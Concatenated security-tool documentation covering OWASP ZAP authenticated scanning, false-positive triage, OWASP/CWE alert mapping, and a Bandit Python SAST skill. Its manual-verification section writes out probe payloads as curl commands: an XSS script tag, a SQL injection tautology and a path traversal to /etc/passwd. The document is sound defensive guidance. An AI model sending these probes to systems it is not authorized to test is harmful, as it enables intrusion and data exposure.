docker run --rm \
-v $(pwd):/zap/wrk/:rw \
-t zaproxy/zap-stable \
zap-full-scan.py \
-t https://app.example.com \
-n /zap/wrk/auth-context.xml \
-r /zap/wrk/auth-report.html
```
## Token-Based Authentication (Bearer Tokens)
### JWT/Bearer Token Configuration
1. **Obtain Authentication Token**
```bash
# Example: Login to get token
TOKEN=$(curl -X POST https://api.example.com/auth/login \
-H "Content-Type: application/json" \
-d '{"username":"testuser","password":"password"}' \
| jq -r '.token')
```
2. **Configure ZAP to Include Token**
Use ZAP Replacer to add Authorization header:
```bash
python3 scripts/zap_auth_scanner.py \
--target https://api.example.com \
--auth-type bearer \
--token-env API_TOKEN \
--output api-auth-scan.html
```
### Manual Token Configuration
Using ZAP automation framework (`zap_automation.yaml`):
```yaml
env:
contexts:
- name: API-Context
urls:
- https://api.example.com
authentication:
method: header
parameters:
header: Authorization
value: "Bearer ${API_TOKEN}"
sessionManagement:
method: cookie
jobs:
- type: spider
parameters:
context: API-Context
user: api-user
- type: activeScan
parameters:
context: API-Context
user: api-user
```
## OAuth 2.0 Authentication
### Authorization Code Flow
1. **Manual Browser-Based Token Acquisition**
```bash
# Step 1: Get authorization code (open in browser)
https://oauth.example.com/authorize?
client_id=YOUR_CLIENT_ID&
redirect_uri=http://localhost:8080/callback&
response_type=code&
scope=openid profile
# Step 2: Exchange code for token
TOKEN=$(curl -X POST https://oauth.example.com/token \
-d "grant_type=authorization_code" \
-d "code=AUTH_CODE_FROM_STEP_1" \
-d "client_id=YOUR_CLIENT_ID" \
-d "client_secret=YOUR_CLIENT_SECRET" \
-d "redirect_uri=http://localhost:8080/callback" \
| jq -r '.access_token')
# Step 3: Use token in ZAP scan
export API_TOKEN="$TOKEN"
python3 scripts/zap_auth_scanner.py \
--target https://api.example.com \
--auth-type bearer \
--token-env API_TOKEN
```
### Client Credentials Flow (Service-to-Service)
```bash
# Obtain token using client credentials
TOKEN=$(curl -X POST https://oauth.example.com/token \
-d "grant_type=client_credentials" \
-d "client_id=YOUR_CLIENT_ID" \
-d "client_secret=YOUR_CLIENT_SECRET" \
-d "scope=api.read api.write" \
| jq -r '.access_token')
export API_TOKEN="$TOKEN"
# Run authenticated scan
python3 scripts/zap_auth_scanner.py \
--target https://api.example.com \
--auth-type bearer \
--token-env API_TOKEN
```
## HTTP Basic/Digest Authentication
### Basic Authentication
```bash
# Option 1: Using environment variable
export BASIC_AUTH="dGVzdHVzZXI6cGFzc3dvcmQ=" # base64(testuser:password)
# Option 2: Using script
python3 scripts/zap_auth_scanner.py \
--target https://app.example.com \
--auth-type http \
--username testuser \
--password-env HTTP_PASSWORD
```
### Digest Authentication
Similar to Basic, but ZAP automatically handles the challenge-response:
```bash
docker run --rm \
-v $(pwd):/zap/wrk/:rw \
-t zaproxy/zap-stable \
zap-full-scan.py \
-t https://app.example.com \
-n /zap/wrk/digest-auth-context.xml \
-r /zap/wrk/digest-auth-report.html
```
## Session Management
### Cookie-Based Sessions
**Default Behavior:** ZAP automatically manages cookies.
**Custom Configuration:**
- Set session cookie name in context
- Configure session timeout
- Define re-authentication triggers
### Token Refresh Handling
For tokens that expire during scan:
```yaml
# zap_automation.yaml
env:
contexts:
- name: API-Context
authentication:
method: script
parameters:
script: |
// JavaScript to refresh token
function authenticate(helper, paramsValues, credentials) {
var loginUrl = "https://api.example.com/auth/login";
var postData = '{"username":"' + credentials.getParam("username") +
'","password":"' + credentials.getParam("password") + '"}';
var msg = helper.prepareMessage();
msg.setRequestHeader("POST " + loginUrl + " HTTP/1.1");
msg.setRequestBody(postData);
helper.sendAndReceive(msg);
var response = msg.getResponseBody().toString();
var token = JSON.parse(response).token;
// Store token for use in requests
helper.getHttpSender().setRequestHeader("Authorization", "Bearer " + token);
return msg;
}
```
## Verification and Troubleshooting
### Verify Authentication is Working
1. **Check Logged-In Indicator**
Run a spider scan and verify protected pages are accessed:
```bash
# Look for dashboard, profile, or other authenticated pages in spider results
```
2. **Monitor Authentication Requests**
Enable ZAP logging to see authentication attempts:
```bash
docker run --rm \
-v $(pwd):/zap/wrk/:rw \
-e ZAP_LOG_LEVEL=DEBUG \
-t zaproxy/zap-stable \
zap-full-scan.py -t https://app.example.com -n /zap/wrk/context.xml
```
3. **Test with Manual Request**
Send a manual authenticated request via ZAP GUI or API to verify credentials work.
### Common Authentication Issues
#### Issue: Session Expires During Scan
**Solution:** Configure re-authentication:
```python
# In zap_auth_scanner.py, add re-authentication trigger
--re-authenticate-on 401,403 \
--verification-interval 300 # Check every 5 minutes
```
#### Issue: CSRF Tokens Required
**Solution:** Use anti-CSRF token handling:
```yaml
# zap_automation.yaml
env:
contexts:
- name: WebApp
authentication:
verification:
method: response
loggedInRegex: "\\QWelcome\\E"
sessionManagement:
method: cookie
parameters:
antiCsrfTokens: true
```
#### Issue: Rate Limiting Blocking Authentication
**Solution:** Slow down scan:
```bash
docker run -t zaproxy/zap-stable zap-full-scan.py \
-t https://app.example.com \
-z "-config scanner.delayInMs=2000 -config scanner.threadPerHost=1"
```
#### Issue: Multi-Step Login (MFA)
**Solution:** Use script-based authentication with Selenium or manual token acquisition.
## Security Best Practices
1. **Never Hardcode Credentials**
- Use environment variables
- Use secrets management tools (Vault, AWS Secrets Manager)
2. **Use Dedicated Test Accounts**
- Create accounts specifically for security testing
- Limit permissions to test data only
- Monitor for abuse
3. **Rotate Credentials Regularly**
- Change test account passwords after each scan
- Rotate API tokens frequently
4. **Log Authentication Attempts**
- Monitor for failed authentication attempts
- Alert on unusual patterns
5. **Secure Context Files**
- Never commit context files with credentials to version control
- Use `.gitignore` to exclude `*.context` files
- Encrypt context files at rest
## Examples by Framework
### Django Application
```bash
# Django CSRF token handling
python3 scripts/zap_auth_scanner.py \
--target https://django-app.example.com \
--auth-type form \
--login-url https://django-app.example.com/accounts/login/ \
--username testuser \
--password-env DJANGO_PASSWORD \
--verification-url https://django-app.example.com/dashboard/
```
### Spring Boot Application
```bash
# Spring Security form login
python3 scripts/zap_auth_scanner.py \
--target https://spring-app.example.com \
--auth-type form \
--login-url https://spring-app.example.com/login \
--username testuser \
--password-env SPRING_PASSWORD
```
### React SPA with JWT
```bash
# Get JWT from API, then scan
TOKEN=$(curl -X POST https://api.example.com/auth/login \
-H "Content-Type: application/json" \
-d '{"email":"test@example.com","password":"password"}' \
| jq -r '.token')
export API_TOKEN="$TOKEN"
python3 scripts/zap_auth_scanner.py \
--target https://spa.example.com \
--auth-type bearer \
--token-env API_TOKEN
```
## Additional Resources
- [ZAP Authentication Documentation](https://www.zaproxy.org/docs/desktop/start/features/authentication/)
- [ZAP Session Management](https://www.zaproxy.org/docs/desktop/start/features/sessionmanagement/)
- [OAuth 2.0 RFC 6749](https://tools.ietf.org/html/rfc6749)

View File

@@ -0,0 +1,427 @@
# ZAP False Positive Handling Guide
Guide for identifying, verifying, and suppressing false positives in OWASP ZAP scan results.
## Overview
DAST tools like ZAP generate false positives - alerts for issues that aren't actually exploitable vulnerabilities. This guide helps you:
1. Identify common false positives
2. Verify findings manually
3. Suppress false positives in future scans
4. Tune scan policies
## Common False Positives
### 1. X-Content-Type-Options Missing
**Alert:** Missing X-Content-Type-Options header
**False Positive Scenario:**
- Static content served by CDNs
- Third-party resources
- Legacy browsers not supported
**Verification:**
```bash
curl -I https://example.com/static/script.js
# Check if browser performs MIME sniffing
```
**When to Suppress:**
- Static content only (CSS, JS, images)
- Content served from trusted CDN
- No user-controlled content in responses
**Suppression Rule:**
```tsv
10021 https://cdn.example.com/.* .* 693 IGNORE
```
### 2. Cookie Without Secure Flag
**Alert:** Cookie without Secure flag set
**False Positive Scenario:**
- Development/testing environments (HTTP)
- Non-sensitive cookies (analytics, preferences)
- Localhost testing
**Verification:**
```bash
curl -I https://example.com
# Check Set-Cookie headers
# Verify if cookie contains sensitive data
```
**When to Suppress:**
- Non-sensitive cookies (theme preference, language)
- HTTP-only development environments
- Third-party analytics cookies
**Suppression Rule:**
```tsv
10054 https://example.com.* _ga|_gid|theme 614 WARN
```
### 3. Cross-Domain JavaScript Source File Inclusion
**Alert:** JavaScript loaded from external domain
**False Positive Scenario:**
- Legitimate CDN usage (jQuery, Bootstrap, etc.)
- Third-party integrations (Google Analytics, Stripe)
- Using Subresource Integrity (SRI)
**Verification:**
```html
<!-- Check if SRI is used -->
<script src="https://cdn.example.com/library.js"
integrity="sha384-HASH"
crossorigin="anonymous"></script>
```
**When to Suppress:**
- CDN resources with SRI
- Trusted third-party services
- Company-owned CDN domains
**Suppression Rule:**
```tsv
10017 https://example.com/.* https://cdn.jsdelivr.net/.* 829 IGNORE
```
### 4. Timestamp Disclosure
**Alert:** Unix timestamps found in response
**False Positive Scenario:**
- Legitimate timestamp fields in API responses
- Non-sensitive metadata
- Public timestamps (post dates, etc.)
**Verification:**
```json
{
"created_at": 1640995200, // Legitimate field
"post_date": "2022-01-01"
}
```
**When to Suppress:**
- API responses with datetime fields
- Public-facing timestamps
- Non-sensitive metadata
**Suppression Rule:**
```tsv
10096 https://api.example.com/.* created_at|updated_at 200 IGNORE
```
### 5. Server Version Disclosure
**Alert:** Server version exposed in headers
**False Positive Scenario:**
- Behind WAF/load balancer (version is of proxy, not app server)
- Generic server headers
- Already public knowledge
**Verification:**
```bash
curl -I https://example.com | grep Server
# Check if version matches actual server
```
**When to Suppress:**
- Proxy/WAF version (not actual app server)
- Generic headers without version numbers
- When other compensating controls exist
**Suppression Rule:**
```tsv
10036 https://example.com.* .* 200 WARN
```
## Verification Methodology
### Step 1: Understand the Alert
Review ZAP alert details:
- **Description:** What is the potential vulnerability?
- **Evidence:** What triggered the alert?
- **CWE/OWASP Mapping:** What category does it fall under?
- **Risk Level:** How severe is it?
### Step 2: Reproduce Manually
Attempt to exploit the vulnerability:
```bash
# For XSS alerts
curl "https://example.com/search?q=<script>alert(1)</script>"
# Check if script is reflected unencoded
# For SQL injection alerts
curl "https://example.com/api/user?id=1' OR '1'='1"
# Check for SQL errors or unexpected behavior
# For path traversal alerts
curl "https://example.com/download?file=../../etc/passwd"
# Check if file is accessible
```
### Step 3: Check Context
Consider the application context:
- Is the functionality available to unauthenticated users?
- Does it handle sensitive data?
- Are there compensating controls (WAF, input validation)?
### Step 4: Document Decision
Create documentation for suppression decisions:
```markdown
## Alert: SQL Injection in /api/user
**Decision:** False Positive
**Rationale:**
- Endpoint requires authentication
- Input is validated server-side (allowlist: 0-9 only)
- WAF rule blocks SQL injection patterns
- Manual testing confirmed no injection possible
**Suppressed:** Yes (Rule ID 40018, /api/user endpoint)
**Reviewed by:** security-team@example.com
**Date:** 2024-01-15
```
## Creating Suppression Rules
### Rules File Format
ZAP uses TSV (tab-separated values) format:
```
alert_id URL_pattern parameter CWE_id action
```
- **alert_id:** ZAP alert ID (e.g., 40018 for SQL Injection)
- **URL_pattern:** Regex pattern for URL
- **parameter:** Parameter name (or .* for all)
- **CWE_id:** CWE identifier
- **action:** IGNORE, WARN, or FAIL
### Example Rules File
`.zap/rules.tsv`:
```tsv
# Suppress X-Content-Type-Options for CDN static content
10021 https://cdn.example.com/static/.* .* 693 IGNORE
# Warn (don't fail) on analytics cookies without Secure flag
10054 https://example.com/.* _ga|_gid 614 WARN
# Ignore timestamp disclosure in API responses
10096 https://api.example.com/.* .* 200 IGNORE
# Ignore legitimate external JavaScript (with SRI)
10017 https://example.com/.* https://cdn.jsdelivr.net/.* 829 IGNORE
# Suppress CSRF warnings for stateless API
10202 https://api.example.com/.* .* 352 IGNORE
```
### Using Rules File
```bash
# Baseline scan with rules
docker run -t zaproxy/zap-stable zap-baseline.py \
-t https://example.com \
-c .zap/rules.tsv \
-r report.html
# Full scan with rules
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-full-scan.py \
-t https://example.com \
-c /zap/wrk/.zap/rules.tsv \
-r /zap/wrk/report.html
```
## Custom Scan Policies
### Disable Entire Scan Rules
Create custom scan policy to disable problematic rules:
1. **Via ZAP GUI:**
- Analyze > Scan Policy Manager
- Create new policy
- Disable specific rules
- Export policy file
2. **Via Automation Framework:**
```yaml
# zap_automation.yaml
jobs:
- type: activeScan
parameters:
policy: Custom-Policy
rules:
- id: 40018 # SQL Injection
threshold: MEDIUM
strength: HIGH
- id: 10202 # CSRF
threshold: OFF # Disable completely
```
## Handling Different Alert Types
### High-Risk Alerts (Never Suppress Without Verification)
- SQL Injection
- Command Injection
- Remote Code Execution
- Authentication Bypass
- Server-Side Request Forgery (SSRF)
**Process:**
1. Manual verification required
2. Security team review
3. Document compensating controls
4. Re-test after fixes
### Medium-Risk Alerts (Contextual Suppression)
- XSS (if output is properly encoded)
- CSRF (if tokens are implemented)
- Missing headers (if compensating controls exist)
**Process:**
1. Verify finding
2. Check for compensating controls
3. Document decision
4. Suppress with WARN (not IGNORE)
### Low-Risk Alerts (Can Be Suppressed)
- Informational headers
- Timestamp disclosure
- Technology fingerprinting
**Process:**
1. Quick verification
2. Document reason
3. Suppress with IGNORE
## Quality Assurance
### Review Suppression Rules Regularly
```bash
# Monthly review checklist
- [ ] Review all suppression rules for continued relevance
- [ ] Check if suppressed issues have been fixed
- [ ] Verify compensating controls are still in place
- [ ] Update rules file with new false positives
```
### Track Suppression Metrics
Monitor suppression trends:
```bash
# Count suppressions by alert type
grep -v '^#' .zap/rules.tsv | awk '{print $1}' | sort | uniq -c
# Alert if suppression count increases significantly
```
### Peer Review Process
Require security team approval for suppressing high-risk alerts:
```yaml
# .github/workflows/security-review.yml
- name: Check for new suppressions
run: |
git diff origin/main .zap/rules.tsv > suppressions.diff
if [ -s suppressions.diff ]; then
echo "New suppressions require security team review"
# Notify security team
fi
```
## Anti-Patterns to Avoid
### ❌ Don't Suppress Everything
Never create blanket suppression rules:
```tsv
# BAD: Suppresses all XSS findings
40012 .* .* 79 IGNORE
```
### ❌ Don't Suppress Without Documentation
Always document why a finding is suppressed:
```tsv
# BAD: No context
10054 https://example.com/.* session_id 614 IGNORE
# GOOD: Documented reason
# Session cookie is HTTPS-only in production; suppressing for staging environment
10054 https://staging.example.com/.* session_id 614 IGNORE
```
### ❌ Don't Ignore High-Risk Findings
Never suppress critical vulnerabilities without thorough investigation:
```tsv
# DANGEROUS: Never suppress SQL injection without verification
40018 https://example.com/.* .* 89 IGNORE
```
## Tools and Scripts
### Analyze ZAP JSON Report
```python
#!/usr/bin/env python3
import json
import sys
with open('report.json') as f:
report = json.load(f)
false_positives = []
for site in report['site']:
for alert in site['alerts']:
if alert['risk'] in ['High', 'Medium']:
print(f"{alert['alert']} - {alert['risk']}")
print(f" URL: {alert['url']}")
print(f" Evidence: {alert.get('evidence', 'N/A')}")
print()
```
### Generate Suppression Rules Template
```bash
# Extract unique alert IDs from report
jq -r '.site[].alerts[] | "\(.pluginid)\t\(.url)\t.*\t\(.cweid)\tWARN"' report.json \
| sort -u > rules-template.tsv
```
## Additional Resources
- [ZAP Alert Details](https://www.zaproxy.org/docs/alerts/)
- [ZAP Scan Rules](https://www.zaproxy.org/docs/docker/baseline-scan/)
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)

View File

@@ -0,0 +1,255 @@
# OWASP ZAP Alert Mapping to OWASP Top 10 2021 and CWE
This reference maps common OWASP ZAP alerts to OWASP Top 10 2021 categories and CWE (Common Weakness Enumeration) identifiers for compliance and reporting.
## OWASP Top 10 2021 Coverage
### A01:2021 - Broken Access Control
**ZAP Alerts:**
- Path Traversal (CWE-22)
- Directory Browsing (CWE-548)
- Cross-Domain Misconfiguration (CWE-346)
- Bypassing Access Controls (CWE-284)
**Risk Level:** High to Medium
**Remediation:**
- Implement proper access control checks on server-side
- Use allowlists for file access patterns
- Disable directory listing
- Enforce CORS policies strictly
### A02:2021 - Cryptographic Failures
**ZAP Alerts:**
- Weak SSL/TLS Ciphers (CWE-327)
- Cookie Without Secure Flag (CWE-614)
- Password Autocomplete (CWE-522)
- Sensitive Information in URL (CWE-598)
**Risk Level:** High to Medium
**Remediation:**
- Use TLS 1.2+ with strong cipher suites
- Set Secure and HttpOnly flags on all cookies
- Disable autocomplete for sensitive fields
- Never transmit sensitive data in URLs
### A03:2021 - Injection
**ZAP Alerts:**
- SQL Injection (CWE-89)
- Cross-Site Scripting (XSS) (CWE-79)
- Command Injection (CWE-78)
- LDAP Injection (CWE-90)
- XML Injection (CWE-91)
- XPath Injection (CWE-643)
**Risk Level:** High
**Remediation:**
- Use parameterized queries (prepared statements)
- Implement context-aware output encoding
- Validate and sanitize all user input
- Use allowlists for input validation
- Implement Content Security Policy (CSP)
### A04:2021 - Insecure Design
**ZAP Alerts:**
- Application Error Disclosure (CWE-209)
- Insufficient Anti-automation (CWE-799)
- Missing Rate Limiting
**Risk Level:** Medium to Low
**Remediation:**
- Implement proper error handling (generic error messages)
- Add CAPTCHA or rate limiting for sensitive operations
- Design security controls during architecture phase
- Implement anti-automation measures
### A05:2021 - Security Misconfiguration
**ZAP Alerts:**
- Missing Security Headers (CWE-693)
- X-Content-Type-Options
- X-Frame-Options (CWE-1021)
- Content-Security-Policy
- Strict-Transport-Security (HSTS)
- Server Leaks Information (CWE-200)
- Default Credentials
- Unnecessary HTTP Methods Enabled (CWE-650)
**Risk Level:** Medium to Low
**Remediation:**
- Configure all security headers properly
- Remove server version headers
- Disable unnecessary HTTP methods (PUT, DELETE, TRACE)
- Change default credentials
- Implement minimal privilege principle
### A06:2021 - Vulnerable and Outdated Components
**ZAP Alerts:**
- Outdated Software Version Detected
- Known Vulnerable Components (requires integration with CVE databases)
**Risk Level:** High to Medium
**Remediation:**
- Maintain software inventory
- Regularly update dependencies and libraries
- Subscribe to security advisories
- Use dependency scanning tools (OWASP Dependency-Check, Snyk)
### A07:2021 - Identification and Authentication Failures
**ZAP Alerts:**
- Weak Authentication (CWE-287)
- Session Fixation (CWE-384)
- Session ID in URL Rewrite (CWE-598)
- Cookie No HttpOnly Flag (CWE-1004)
- Credential Enumeration (CWE-209)
**Risk Level:** High
**Remediation:**
- Implement multi-factor authentication (MFA)
- Use secure session management
- Regenerate session IDs after login
- Set HttpOnly and Secure flags on session cookies
- Implement account lockout mechanisms
- Use generic error messages for authentication failures
### A08:2021 - Software and Data Integrity Failures
**ZAP Alerts:**
- Missing Subresource Integrity (SRI) (CWE-353)
- Insecure Deserialization (CWE-502)
**Risk Level:** High to Medium
**Remediation:**
- Implement Subresource Integrity for CDN resources
- Avoid deserializing untrusted data
- Use digital signatures for critical data
- Implement integrity checks
### A09:2021 - Security Logging and Monitoring Failures
**ZAP Alerts:**
- Authentication attempts not logged
- No monitoring of security events
**Risk Level:** Low (detection issue, not vulnerability)
**Remediation:**
- Log all authentication attempts
- Monitor for security anomalies
- Implement centralized logging
- Set up alerts for suspicious activities
### A10:2021 - Server-Side Request Forgery (SSRF)
**ZAP Alerts:**
- Server-Side Request Forgery (CWE-918)
- External Redirect (CWE-601)
**Risk Level:** High
**Remediation:**
- Validate and sanitize all URLs
- Use allowlists for allowed domains
- Disable unnecessary URL schemas (file://, gopher://)
- Implement network segmentation
## ZAP Alert ID to OWASP/CWE Quick Reference
| Alert ID | Alert Name | OWASP 2021 | CWE | Risk |
|----------|-----------|------------|-----|------|
| 40018 | SQL Injection | A03 | CWE-89 | High |
| 40012 | Cross-Site Scripting (Reflected) | A03 | CWE-79 | High |
| 40014 | Cross-Site Scripting (Persistent) | A03 | CWE-79 | High |
| 40013 | Cross-Site Scripting (DOM) | A03 | CWE-79 | High |
| 6 | Path Traversal | A01 | CWE-22 | High |
| 7 | Remote File Inclusion | A01 | CWE-98 | High |
| 90019 | Server-Side Code Injection | A03 | CWE-94 | High |
| 90020 | Remote OS Command Injection | A03 | CWE-78 | High |
| 90033 | Loosely Scoped Cookie | A07 | CWE-565 | Medium |
| 10021 | X-Content-Type-Options Missing | A05 | CWE-693 | Low |
| 10020 | X-Frame-Options Missing | A05 | CWE-1021 | Medium |
| 10038 | Content Security Policy Missing | A05 | CWE-693 | Medium |
| 10035 | Strict-Transport-Security Missing | A05 | CWE-319 | Low |
| 10054 | Cookie Without Secure Flag | A02 | CWE-614 | Medium |
| 10010 | Cookie No HttpOnly Flag | A07 | CWE-1004 | Medium |
| 10098 | Cross-Domain Misconfiguration | A01 | CWE-346 | Medium |
| 10055 | CSP Scanner: Wildcard Directive | A05 | CWE-693 | Medium |
| 10096 | Timestamp Disclosure | A05 | CWE-200 | Low |
| 10049 | Weak Authentication Method | A07 | CWE-287 | Medium |
| 40029 | Server-Side Request Forgery | A10 | CWE-918 | High |
## Risk Level Priority Matrix
### High Risk (Immediate Action Required)
- SQL Injection
- Remote Code Execution
- Authentication Bypass
- SSRF
- XXE (XML External Entity)
### Medium Risk (Fix in Current Sprint)
- XSS (Cross-Site Scripting)
- CSRF (Cross-Site Request Forgery)
- Missing Security Headers (CSP, X-Frame-Options)
- Insecure Cookie Configuration
- Path Traversal (with limited impact)
### Low Risk (Fix in Backlog)
- Information Disclosure (version headers)
- Missing Informational Headers
- Timestamp Disclosure
- Autocomplete on Form Fields
### Informational (Documentation/Awareness)
- Server Technology Disclosure
- Application Error Messages
- Charset Mismatch
## Compliance Mapping
### PCI-DSS 3.2.1
- **Requirement 6.5.1** (Injection): SQL Injection, Command Injection, XSS
- **Requirement 6.5.3** (Insecure Cryptography): Weak SSL/TLS, Insecure Cookies
- **Requirement 6.5.7** (XSS): All XSS variants
- **Requirement 6.5.8** (Access Control): Path Traversal, Broken Access Control
- **Requirement 6.5.10** (Authentication): Weak Authentication, Session Management
### NIST 800-53
- **AC-3** (Access Enforcement): Path Traversal, Authorization Issues
- **IA-5** (Authenticator Management): Weak Authentication
- **SC-8** (Transmission Confidentiality): Missing HTTPS, Weak TLS
- **SI-10** (Information Input Validation): All Injection Flaws
### GDPR
- **Article 32** (Security of Processing): All High/Medium findings affecting data security
- **Article 25** (Data Protection by Design): Security Misconfigurations
## Usage in Reports
When generating compliance reports, reference this mapping to:
1. **Categorize findings** by OWASP Top 10 category
2. **Assign CWE IDs** for standardized vulnerability classification
3. **Map to compliance requirements** for audit trails
4. **Prioritize remediation** based on risk level and compliance impact
5. **Track metrics** by OWASP category over time
## Additional Resources
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [CWE Top 25](https://cwe.mitre.org/top25/)
- [ZAP Alert Details](https://www.zaproxy.org/docs/alerts/)
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)

View File

@@ -0,0 +1,305 @@
---
name: sast-bandit
description: >
Python security vulnerability detection using Bandit SAST with CWE and OWASP mapping.
Use when: (1) Scanning Python code for security vulnerabilities and anti-patterns,
(2) Identifying hardcoded secrets, SQL injection, command injection, and insecure APIs,
(3) Generating security reports with severity classifications for CI/CD pipelines,
(4) Providing remediation guidance with security framework references,
(5) Enforcing Python security best practices in development workflows.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [sast, bandit, python, vulnerability-scanning, owasp, cwe, security-linting]
frameworks: [OWASP, CWE]
dependencies:
python: ">=3.8"
packages: [bandit]
references:
- https://github.com/PyCQA/bandit
- https://bandit.readthedocs.io/
- https://owasp.org/www-project-top-ten/
---
# Bandit Python SAST
## Overview
Bandit is a security-focused static analysis tool for Python that identifies common security vulnerabilities and coding anti-patterns. It parses Python code into Abstract Syntax Trees (AST) and executes security plugins to detect issues like hardcoded credentials, SQL injection, command injection, weak cryptography, and insecure API usage. Bandit provides actionable reports with severity classifications aligned to industry security standards.
## Quick Start
Scan a Python file or directory for security vulnerabilities:
```bash
# Install Bandit
pip install bandit
# Scan single file
bandit suspicious_file.py
# Scan entire directory recursively
bandit -r /path/to/python/project
# Generate JSON report
bandit -r project/ -f json -o bandit_report.json
# Scan with custom config
bandit -r project/ -c .bandit.yaml
```
## Core Workflow
### Step 1: Install and Configure Bandit
Install Bandit via pip:
```bash
pip install bandit
```
Create a configuration file `.bandit` or `.bandit.yaml` to customize scans:
```yaml
# .bandit.yaml
exclude_dirs:
- /tests/
- /venv/
- /.venv/
- /node_modules/
skips:
- B101 # Skip assert_used checks in test files
tests:
- B201 # Flask app run with debug=True
- B301 # Pickle usage
- B601 # Shell injection
- B602 # Shell=True in subprocess
```
### Step 2: Execute Security Scan
Run Bandit against Python codebase:
```bash
# Basic scan with severity threshold
bandit -r . -ll # Report only medium/high severity
# Comprehensive scan with detailed output
bandit -r . -f json -o report.json -v
# Scan with confidence filtering
bandit -r . -i # Show only high confidence findings
# Exclude specific tests
bandit -r . -s B101,B601
```
### Step 3: Analyze Results
Bandit reports findings with:
- **Issue Type**: Vulnerability category (e.g., hardcoded_password, sql_injection)
- **Severity**: LOW, MEDIUM, HIGH
- **Confidence**: LOW, MEDIUM, HIGH
- **CWE**: Common Weakness Enumeration reference
- **Location**: File path and line number
Example output:
```
>> Issue: [B105:hardcoded_password_string] Possible hardcoded password: 'admin123'
Severity: Medium Confidence: Medium
CWE: CWE-259 (Use of Hard-coded Password)
Location: app/config.py:12
```
### Step 4: Prioritize Findings
Focus remediation efforts using this priority matrix:
1. **Critical**: HIGH severity + HIGH confidence
2. **High**: HIGH severity OR MEDIUM severity + HIGH confidence
3. **Medium**: MEDIUM severity + MEDIUM confidence
4. **Low**: LOW severity OR LOW confidence
### Step 5: Remediate Vulnerabilities
For each finding, consult the bundled `references/remediation_guide.md` for secure coding patterns. Common remediation strategies:
- **Hardcoded Secrets (B105, B106)**: Use environment variables or secret management services
- **SQL Injection (B608)**: Use parameterized queries with SQLAlchemy or psycopg2
- **Command Injection (B602, B605)**: Avoid `shell=True`, use `shlex.split()` for argument parsing
- **Weak Cryptography (B303, B304)**: Replace MD5/SHA1 with SHA256/SHA512 or bcrypt for passwords
- **Insecure Deserialization (B301)**: Avoid pickle, use JSON or MessagePack with schema validation
### Step 6: Integrate into CI/CD
Add Bandit to CI/CD pipelines to enforce security gates:
```yaml
# .github/workflows/security-scan.yml
name: Security Scan
on: [push, pull_request]
jobs:
bandit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install Bandit
run: pip install bandit
- name: Run Bandit
run: bandit -r . -f json -o bandit-report.json
- name: Check for high severity issues
run: bandit -r . -ll -f txt || exit 1
```
Use the bundled script `scripts/bandit_analyzer.py` for enhanced reporting with OWASP mapping.
## Security Considerations
- **Sensitive Data Handling**: Bandit reports may contain code snippets with hardcoded credentials. Ensure reports are stored securely and access is restricted. Use `--no-code` flag to exclude code snippets from reports.
- **Access Control**: Run Bandit in sandboxed CI/CD environments with read-only access to source code. Restrict write permissions to prevent tampering with security configurations.
- **Audit Logging**: Log all Bandit executions with timestamps, scan scope, findings count, and operator identity for security auditing and compliance purposes.
- **Compliance**: Bandit supports SOC2, PCI-DSS, and GDPR compliance by identifying security weaknesses. Document scan frequency, remediation timelines, and exception approvals for audit trails.
- **False Positives**: Review LOW confidence findings manually. Use inline `# nosec` comments sparingly and document justifications in code review processes.
## Bundled Resources
### Scripts (`scripts/`)
- `bandit_analyzer.py` - Enhanced Bandit wrapper that parses JSON output, maps findings to OWASP Top 10, generates HTML reports, and integrates with ticketing systems. Use for comprehensive security reporting.
### References (`references/`)
- `remediation_guide.md` - Detailed secure coding patterns for common Bandit findings, including code examples for SQLAlchemy parameterization, secure subprocess usage, and cryptographic best practices. Consult when remediating specific vulnerability types.
- `cwe_owasp_mapping.md` - Complete mapping between Bandit issue codes, CWE identifiers, and OWASP Top 10 categories. Use for security framework alignment and compliance reporting.
### Assets (`assets/`)
- `bandit_config.yaml` - Production-ready Bandit configuration with optimized test selection, exclusion patterns for common false positives, and severity thresholds. Use as baseline configuration for projects.
- `pre-commit-config.yaml` - Pre-commit hook configuration for Bandit integration. Prevents commits with HIGH severity findings.
## Common Patterns
### Pattern 1: Baseline Security Scan
Establish security baseline for legacy codebases:
```bash
# Generate baseline report
bandit -r . -f json -o baseline.json
# Compare future scans against baseline
bandit -r . -f json -o current.json
diff <(jq -S . baseline.json) <(jq -S . current.json)
```
### Pattern 2: Security Gating in Pull Requests
Block merges with HIGH severity findings:
```bash
# Exit with error if HIGH severity issues found
bandit -r . -lll -f txt
if [ $? -ne 0 ]; then
echo "HIGH severity security issues detected - blocking merge"
exit 1
fi
```
### Pattern 3: Progressive Security Hardening
Incrementally increase security standards:
```bash
# Phase 1: Block only CRITICAL (HIGH severity + HIGH confidence)
bandit -r . -ll -i
# Phase 2: Block HIGH severity
bandit -r . -ll
# Phase 3: Block MEDIUM and above
bandit -r . -l
```
### Pattern 4: Suppressing False Positives
Document exceptions inline with justification:
```python
# Example: Suppressing pickle warning for internal serialization
import pickle # nosec B301 - Internal cache, not user input
def load_cache(file_path):
with open(file_path, 'rb') as f:
return pickle.load(f) # nosec B301
```
## Integration Points
- **CI/CD**: Integrate as GitHub Actions, GitLab CI, Jenkins pipeline stage, or pre-commit hook. Use `scripts/bandit_analyzer.py` for enhanced reporting.
- **Security Tools**: Combine with Semgrep for additional SAST coverage, Safety for dependency scanning, and SonarQube for code quality metrics.
- **SDLC**: Execute during development (pre-commit), code review (PR checks), and release gates (pipeline stage). Establish baseline scans for legacy code and enforce strict checks for new code.
- **Ticketing Integration**: Use `scripts/bandit_analyzer.py` to automatically create Jira/GitHub issues for HIGH severity findings with remediation guidance.
## Troubleshooting
### Issue: Too Many False Positives
**Solution**:
1. Use confidence filtering: `bandit -r . -i` (HIGH confidence only)
2. Exclude test files: `bandit -r . --exclude /tests/`
3. Customize `.bandit.yaml` to skip specific tests for known safe patterns
4. Review and suppress with inline `# nosec` comments with justification
### Issue: Scan Performance on Large Codebases
**Solution**:
1. Exclude dependencies: Add `/venv/`, `/.venv/`, `/site-packages/` to `.bandit.yaml` exclude_dirs
2. Use multiprocessing: Bandit automatically parallelizes for directories
